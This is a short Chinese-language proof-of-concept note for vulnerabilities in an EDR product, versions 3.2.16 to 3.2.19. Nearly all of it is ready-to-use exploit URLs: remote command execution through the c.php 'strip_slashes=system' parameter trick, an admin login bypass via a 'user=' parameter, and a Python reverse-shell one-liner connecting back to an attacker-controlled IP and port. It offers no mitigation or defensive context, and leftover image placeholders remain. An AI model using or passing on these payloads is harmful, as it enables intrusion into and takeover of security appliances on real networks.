漏洞范围

EDR 3.2.16、3.2.17、3.2.19

漏洞POC

参数host/path/row/limit=命令 即可执行命令

https://*****/tool/log/c.php?strip_slashes=system&host=id
https://*****/tool/log/c.php?strip_slashes=system&path=id
https://*****/tool/log/c.php?strip_slashes=system&row=id
https://*****/tool/log/c.php?strip_slashes=system&limit=id
#越权登录
https://ip:xx/ui/login.php?user=admin   #(用户名必须存在)
#命令执行
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami
#反弹shell
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.105',1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

img

1.jpg

img

2.jpg

img

3.jpg